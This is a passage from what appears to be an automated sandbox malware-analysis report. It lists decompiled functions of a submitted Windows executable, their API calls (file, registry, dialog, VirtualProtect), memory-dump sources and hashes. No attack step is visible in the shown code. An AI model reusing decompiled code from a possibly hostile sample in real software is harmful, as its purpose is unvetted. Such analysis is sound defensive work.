						E004061B5();
					}
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                            0x00402733
                                                            0x00402733
                                                            0x00402734
                                                            0x0040273c
                                                            0x00402741
                                                            0x00402742
                                                            0x00402751
                                                            0x0040275a
                                                            0x00402760
                                                            0x00402a42
                                                            0x00402a42
                                                            0x0040275a
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402751
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FilePointerwsprintf
                                                            • String ID:
                                                            • API String ID: 327478801-0
                                                            • Opcode ID: 07574b4eec459b89e3c9016d49a80b1f7a586a3dff9f977a09ac077d2d2bcedb
                                                            • Instruction ID: 0afbb9a68c7e6de16fd8fdbcd45b0e83c324d239dd732ad329437b7c16d25a86
                                                            • Opcode Fuzzy Hash: 07574b4eec459b89e3c9016d49a80b1f7a586a3dff9f977a09ac077d2d2bcedb
                                                            • Instruction Fuzzy Hash: 97E09271A00104BFD700EB94AF898AE7769DB85314B24043BF102F50C1DA7848518A3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004023A4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004023A4(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402C39(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402C39(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
					_t11 = E00402C39(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402C39(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}








                                                            0x004023a4
                                                            0x004023a4
                                                            0x004023a6
                                                            0x004023aa
                                                            0x004023ad
                                                            0x004023b5
                                                            0x004023b9
                                                            0x004023c2
                                                            0x004023c2
                                                            0x004023c7
                                                            0x004023d0
                                                            0x004023d0
                                                            0x004023dd
                                                            0x004015ae
                                                            0x004015b0
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023DD
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction ID: f0bce9e42b5e283f9075ac1063ffb1f66a35e0649843f6992b50a90661d40e1e
                                                            • Opcode Fuzzy Hash: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction Fuzzy Hash: 8BE04831604128ABE7203EF21F8D97F10989B84304B64053FBA01B61C2D9FD4C4242A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040610B Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040610B(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040605C(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                            0x00406115
                                                            0x0040611e
                                                            0x00406134
                                                            0x00000000
                                                            0x00406134
                                                            0x00406122
                                                            0x00000000

                                                            APIs
                                                            • RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406134
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                            • Instruction ID: f3dc4abaab06895e066b0b710936ca54da7b1f8b7a25aa4512e4b4def2a222e8
                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                            • Instruction Fuzzy Hash: BAE0E672110209BEEF195F50DC0AD7B371DEB14314F01452EF947D4091E6B5A9305634
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405E62(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                            0x00405e66
                                                            0x00405e76
                                                            0x00405e7e
                                                            0x00000000
                                                            0x00405e85
                                                            0x00000000
                                                            0x00405e87

                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405E76
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                            • Instruction ID: d159feaa40f66387c232a0365126d803d89e879c5a9a8176c13ce5bb2f202f1c
                                                            • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                            • Instruction Fuzzy Hash: CFE0B63221025AAFDF109F95DC00AAB7B6CEB05260F144437FD99E6150D671E961DAE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405E91 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405E91(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                            0x00405e95
                                                            0x00405ea5
                                                            0x00405ead
                                                            0x00000000
                                                            0x00405eb4
                                                            0x00000000
                                                            0x00405eb6

                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405EA5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction ID: f6dbd1b2bb29cf3778f9da1b12eb4ab865b2d476cff05d6c6da3e568d4bed244
                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction Fuzzy Hash: CEE0EC3221165AABEF119F65DC00AEB7B6CEB05361F004836FA95E3150D631E9219BE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C219C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73c25014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x73c2501c, 4, 0x40, 0x73c25034); // executed
					 *0x73c2501c = 0xc2;
					 *0x73c25034 = 0;
					 *0x73c25030 = 0;
					 *0x73c2502c = 0;
					 *0x73c25028 = 0;
					 *0x73c25024 = 0;
					 *0x73c25020 = 0;
					 *0x73c2501e = 0;
				}
				return 1;
			}



                                                            0x73c219d0
                                                            0x73c219d5
                                                            0x73c219e5
                                                            0x73c219ed
                                                            0x73c219f4
                                                            0x73c219fa
                                                            0x73c21a00
                                                            0x73c21a06
                                                            0x73c21a0c
                                                            0x73c21a12
                                                            0x73c21a18
                                                            0x73c21a18
                                                            0x73c21a21

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(73C2501C,00000004,00000040,73C25034), ref: 73C219E5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 15241bb7f55085dee971d7b45fbeb7aa7bfa3ee3b330ee043f9bab4e82721aba
                                                            • Instruction ID: ef806b6c7f1db746227af7855f0d35a65a1f67c8bfa0e9a8e02ca02a2756c57e
                                                            • Opcode Fuzzy Hash: 15241bb7f55085dee971d7b45fbeb7aa7bfa3ee3b330ee043f9bab4e82721aba
                                                            • Instruction Fuzzy Hash: 16F02EF2939380DAC315EF1E9D54717BEA0A729355F20852EF75DDA342C3704901AB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004060DD Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004060DD(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040605C(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                            0x004060e7
                                                            0x004060ee
                                                            0x00406101
                                                            0x00000000
                                                            0x00406101
                                                            0x004060f2
                                                            0x00000000

                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,?,?), ref: 00406101
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                            • Instruction ID: acfb9daac442d6471bee54970dc50a73ebaac4160da87f0822be439bec8b4f66
                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                            • Instruction Fuzzy Hash: 01D0123204020DFBEF119F90DD05FAB3B1DAB08310F014426FE06A4091D776D530A724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402C39(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                            0x004015a8
                                                            0x004015ae
                                                            0x004015b0
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2f1dc3e331dcca38650a39e9bf41526ebb0769b17cd67352e17b334425b0364b
                                                            • Instruction ID: e4c96a1e4e3d7fafacf821d9605d951cf466c31607fdae1070ddd011c57cfc7f
                                                            • Opcode Fuzzy Hash: 2f1dc3e331dcca38650a39e9bf41526ebb0769b17cd67352e17b334425b0364b
                                                            • Instruction Fuzzy Hash: 4DD01232B14104DBDB10DFA5AB0899E73A4DB55325B308577E101F21D1D6B9D9409B3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004042D4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004042D4(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E004062EA(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}









                                                            0x004042ee
                                                            0x004042f3

                                                            APIs
                                                            • SetDlgItemTextA.USER32(?,?,00000000), ref: 004042EE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemText
                                                            • String ID:
                                                            • API String ID: 3367045223-0
                                                            • Opcode ID: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction ID: 22e3c99022c4b401909cfeccc5f53fcf3645d9aba18eb3be6cde127aefdf9dc7
                                                            • Opcode Fuzzy Hash: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction Fuzzy Hash: 26C04C75548200BFD641B755CC42F1FB799EFA432AF00C52EB15DA11D1C635C8209A2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404320 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404320(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x44e3f8;
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                            0x00404320
                                                            0x00404327
                                                            0x00404332
                                                            0x00000000
                                                            0x00404332
                                                            0x00404338

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
